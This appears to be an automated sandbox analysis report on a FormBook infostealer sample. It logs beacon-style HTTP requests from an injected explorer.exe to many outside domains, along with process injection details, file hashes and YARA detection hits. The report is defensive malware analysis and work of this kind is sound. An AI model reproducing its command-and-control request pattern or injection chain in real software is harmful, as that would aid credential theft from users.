Dec 2, 2021 20:01:13.388248920 CET	5935	OUT	GET /mwev/?-Zf=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/pECdGagYy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.rip-online.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:01:13.579788923 CET	5936	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 02 Dec 2021 19:01:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49816	147.255.129.44	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:30.227936983 CET	5708	OUT	GET /mwev/?-Zf=iTGszEHgBfgYRglEf8qTe/0GehEi8eYY5QDShU32F6t0wDyeZFMPJI0cijyvgJ5fvuvy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.21yingyang.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:30.732290983 CET	5708	IN	HTTP/1.1 404 Not Found Transfer-Encoding: chunked Server: Nginx Microsoft-HTTPAPI/2.0 X-Powered-By: Nginx Date: Thu, 02 Dec 2021 19:00:25 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49834	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:35.804476976 CET	5747	OUT	GET /mwev/?-Zf=muoWufO8p6lksAUPj07m8fqHwDrNKoj9M2hBle0NDwQN4kTZYCe/nJ8SwFL4fqBvjDWp&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.texascountrycharts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:36.003988981 CET	5749	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Thu, 02 Dec 2021 19:00:35 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49852	87.236.16.208	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:41.277611017 CET	5789	OUT	GET /mwev/?-Zf=/zd6oxG+H6qci+O+cHlZDp/zFP0nYcFn0YDhkjhJJtSXAtrcRYu0trJUidLUZZla0YBM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.tikomobile.store Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:41.402823925 CET	5791	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 02 Dec 2021 19:00:41 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 287 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 77 65 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 69 6b 6f 6d 6f 62 69 6c 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mwev/ was not found on this server.</p><hr><address>Apache/2.4.10 (Unix) Server at www.tikomobile.store Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49857	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:46.504425049 CET	5801	OUT	GET /mwev/?-Zf=vthKUgsgoRJ92n81Fuh07g/ARRJh8nN5iXUIpLSVgoOHRdB6AKBPErPncdrss3E6nFAH&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.fulvousemollientplanet.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:46.553481102 CET	5803	IN	HTTP/1.1 403 Forbidden Date: Thu, 02 Dec 2021 19:00:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: -1 X-Dc: gcp-europe-west1 X-Request-ID: 1172709a-00f8-4954-b923-2ab5922ac1c1 X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 6b76cccebf534ebc-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis
Dec 2, 2021 20:00:46.553522110 CET	5804	IN	Data Raw: 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b Data Ascii: play:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action
Dec 2, 2021 20:00:46.553544044 CET	5805	IN	Data Raw: 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a Data Ascii: negado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": {
Dec 2, 2021 20:00:46.553566933 CET	5807	IN	Data Raw: 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 Data Ascii: -title": " " }, "ja": { "title": "", "content-title
Dec 2, 2021 20:00:46.553586006 CET	5807	IN	Data Raw: 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 Data Ascii: r (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"];
Dec 2, 2021 20:00:46.553596973 CET	5807	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49859	142.250.203.115	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:51.645944118 CET	5816	OUT	GET /mwev/?-Zf=wD7IX5djK39N0mXOoKckCLddnCt/+mP/xVLK1b09pQyAIyzBpLPKZ8m7O34kMZ4xQV6J&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.experimentwithoutlimits.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:51.680239916 CET	5817	IN	HTTP/1.1 302 Found Location: http://forcingfunction.com/workbook Date: Thu, 02 Dec 2021 19:00:51 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 232 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 66 6f 72 63 69 6e 67 66 75 6e 63 74 69 6f 6e 2e 63 6f 6d 2f 77 6f 72 6b 62 6f 6f 6b 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://forcingfunction.com/workbook">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49873	198.143.147.58	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:00:57.042764902 CET	5853	OUT	GET /mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.websitessample.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:00:57.434561014 CET	5858	IN	HTTP/1.1 301 Moved Permanently Connection: close X-Powered-By: PHP/7.4.12 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://websitessample.com/mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp Content-Length: 0 Date: Thu, 02 Dec 2021 19:00:59 GMT Server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49900	107.164.242.49	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:01:02.664268970 CET	5915	OUT	GET /mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.foxandmew.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:01:02.834745884 CET	5918	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 02 Dec 2021 19:01:02 GMT Server: Apache/2 Location: https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp Content-Length: 339 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 78 61 6e 64 6d 65 77 2e 63 6f 6d 2f 6d 77 65 76 2f 3f 2d 5a 66 3d 72 63 36 63 47 39 6c 65 52 72 75 54 78 2f 59 46 61 6d 43 63 7a 59 59 47 6d 65 36 66 48 64 76 4d 62 49 78 76 2b 77 41 75 44 7a 6d 48 44 59 53 4f 32 33 36 44 49 53 4f 76 4f 4c 6b 4b 4f 4b 69 59 71 2f 34 52 26 61 6d 70 3b 76 30 47 54 54 3d 39 72 6e 74 58 56 51 78 50 66 53 38 39 70 76 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49908	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 2, 2021 20:01:07.891082048 CET	5934	OUT	GET /mwev/?-Zf=IjrmxmCSNg9SW3Y0DfjHEVuIkvJ5tkiLJE48G3emnLXjviiyyOAbNkhdp+PdSxIUf+MM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1 Host: www.9linefarms.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 2, 2021 20:01:08.006105900 CET	5934	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 02 Dec 2021 19:01:07 GMT Content-Type: text/html Content-Length: 275 ETag: "618be761-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 1D4l9eR0W4.exe PID: 1476 Parent PID: 5696

General

Start time:	19:59:10
Start date:	02/12/2021
Path:	C:\Users\user\Desktop\1D4l9eR0W4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1D4l9eR0W4.exe"
Imagebase:	0xe80000
File size:	415744 bytes
MD5 hash:	192B796D92D190C45204571599C38C86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.665105654.000000000333D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.665079576.0000000003301000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: 1D4l9eR0W4.exe PID: 5548 Parent PID: 1476

General

Start time:	19:59:13
Start date:	02/12/2021
Path:	C:\Users\user\Desktop\1D4l9eR0W4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\1D4l9eR0W4.exe
Imagebase:	0xdf0000
File size:	415744 bytes
MD5 hash:	192B796D92D190C45204571599C38C86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 5548

General

Start time:	19:59:16
Start date:	02/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: wlanext.exe PID: 7004 Parent PID: 3424

General

Start time:	19:59:35
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wlanext.exe
Imagebase:	0x910000
File size:	78848 bytes
MD5 hash:	CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
